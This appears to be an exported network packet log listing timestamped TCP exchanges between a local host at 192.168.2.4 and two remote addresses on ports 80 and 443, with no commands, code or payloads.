                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.561542988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.561546087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.561597109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.561928988 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562406063 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562447071 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562525034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562581062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562642097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562689066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562988997 CET49774443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.562995911 CET4434977413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.563612938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.563668013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.563707113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.563761950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.564769983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.564794064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.564824104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.564842939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.566016912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.566080093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.566083908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.566137075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.566903114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.566960096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.566982031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.567038059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.567975044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.568028927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.568124056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.568188906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.569101095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.569155931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.569394112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.569448948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.570190907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.570250034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.570336103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.570386887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.571238041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.571296930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.571329117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.571378946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.572326899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.572381020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.572462082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.572513103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.573412895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.573467016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.573470116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.573518991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.574496031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.574548006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.574616909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.574667931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.575583935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.575634956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.679160118 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.679861069 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.679877996 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.680262089 CET49775443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.680268049 CET4434977513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.728753090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.728856087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.728862047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.728950024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.729132891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.729173899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.729206085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.729284048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.730096102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.730190992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.730207920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.730277061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.731170893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.731224060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.731266975 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.731331110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.732275009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.732328892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.732368946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.732419014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.733339071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.733433962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.733443022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.733494997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.734425068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.734478951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.734524012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.734571934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.735522985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.735577106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.735618114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.735667944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.736684084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.736743927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.736783981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.736836910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.737725973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.737782001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.737823963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.737874985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.738810062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.738869905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.738955021 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.739015102 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.739912987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.739965916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.740144968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.740196943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.740997076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.741048098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.741107941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.741159916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.742067099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.742130041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.742182016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.742233038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.743200064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.743263006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.743396997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.743448019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.744250059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.744313002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.744353056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.744402885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.745353937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.745425940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.745492935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.745547056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.746413946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.746470928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.746505976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.746596098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.747509003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.747562885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.747597933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.747647047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.748666048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.748718023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.748744965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.748801947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.749700069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.749804974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.749859095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.749932051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.750833035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.750893116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.750912905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.750978947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.751847029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.751965046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.751986980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.752043009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.752964973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.753026009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.753106117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.753165007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.754029036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.754098892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.754133940 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.754189014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.755117893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.755201101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.755234957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.755321026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.756197929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.756258965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.756309986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.756362915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.757313967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.757379055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.757437944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.757491112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.758397102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.758451939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.758495092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.758548021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.759521961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.759576082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.759601116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.759727001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.760582924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.760636091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.760668993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.760725975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.761682987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.761754990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.761907101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.761986971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.762752056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.762818098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.762862921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.762916088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.763875008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.763933897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.763974905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.764028072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.764942884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.765002012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.765059948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.765105009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.766062021 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.766113043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.766155005 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.766207933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.767149925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.767201900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.767224073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.767275095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.768199921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.768248081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.768290997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.768341064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.769294977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.769356012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.769414902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.769467115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.770405054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.770494938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.770538092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.770587921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.771470070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.771522045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.771599054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.771651983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.772569895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.772624016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.772692919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.772754908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.773685932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.773739100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.773823977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.773869038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.774724007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.774768114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.774825096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.774880886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.775887966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.775937080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.776060104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.776104927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.777060986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.777118921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.777189016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.777241945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.778111935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.778163910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.778168917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.778209925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.779098988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.779155970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.779236078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.779289007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.780222893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.780311108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.780317068 CET4977080192.168.2.431.41.244.11
